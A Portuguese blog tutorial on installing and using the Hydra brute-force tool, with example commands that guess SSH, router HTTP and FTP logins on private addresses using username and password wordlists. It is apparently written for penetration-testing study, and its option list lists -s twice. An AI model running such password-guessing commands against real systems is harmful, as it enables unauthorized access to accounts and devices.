Realizando Brute Force Com Hydra

Pessoal, nesse post irei mostrar um pouco do Hydra, ela é uma excelente ferramenta de brute force desenvolvida por Van Hauser e David Maciejak, ela cobre uma enorme quantidade de serviços que podem ser alvos de brute force, como http, ssh, ftp, mysql entre muitos outros.

O Hydra já vem instalado por padrão no Kali, e tbm pode ser instalado via apt-get:

# apt-get install hydra hydra-gtk

Caso você deseje compilar o pacote para ter a última versão siga os passos seguintes, primeiro iremos instalar algumas dependências. Estamos utilizando o Ubuntu server 14.04 aqui.

# apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncurses5-dev

Depois baixe a última versão do Hydra:

# wget https://www.thc.org/releases/hydra-8.0.tar.gz

Agora descompacte e entre no diretório:

# tar -xvzf hydra-8.0.tar.gz && cd hydra-8.0

Depois compile e instale:

# ./configure
# make
# make install

Pronto com seu Hydra instalado vamos conhece-lo, primeiramente vamos dar uma olhada em todos os serviços que o Hydra da suporte, segue a lista abaixo:

asterisk cisco cisco-enable cvs firebird ftp  ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Os principais parâmetros são:

• -s  Define a porta de destino
• -l  Define o usuário de acesso
• -L  Define o arquivo de wordlist de usuários
• -p  Define a senha
• -P  Define o arquivo de wordlist de senhas
• -M  Define o arquivo de wordlist de alvos
• -t  Define o número de conexões em paralelo, default 16
• -f  Faz o hydra parar quando o primeiro user/password é encontrado
• -s  Conecta via ssl
• -vV  Define modo verbose

Para fazer um teste básico no serviço de ssh execute:

# hydra -s 22 -l root -p popai123 192.168.0.53 ssh

Para trocar a porta padrão do ssh e adicionar uma wordlist faça:

# hydra -s 6254 -l root -P /home/guiadoti/passwd.txt -t 64 192.168.0.44 ssh

Você pode setar ambas wordlists e definir um “mode insano” mas parar no primeiro resultado:

# hydra -s 6548 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.66 ssh

A lógica para outros serviços é a mesma, veja um exemplo de brute force no router:

# hydra -s 80 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.1 http

Agora em um servidor FTP:

# hydra -s 21 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -f -vV 192.168.0.33 ftp

É isso ai pessoal, espero que curtem e que usem com moderação, não saiam fazendo merda por ai, lembrem da lei carolina dieckmann…suhaushas. Até mais.

• Sobre
• Últimos Posts

Siga me

Ricardo Galossi

É um apaixonado por segurança da informação, atua profissionalmente há mais de 7 anos na área de tecnologia da informação, onde é focado em análise de vulnerabilidades e testes de invasão.Criou o blog Guia do TI para compartilhar conhecimento, ajudar os mais novos, incentivar debates e manter a comunidade atualizada com as principais notícias da área de TI.

Siga me

Últimos posts por Ricardo Galossi (exibir todos)

• Metasploit Framework de cabo a rabo – Parte 6 - 4 de junho de 2018
• Metasploit Framework de cabo a rabo – Parte 5 - 28 de maio de 2018
• CEH – Scanning Networks – Parte 2 - 24 de maio de 2018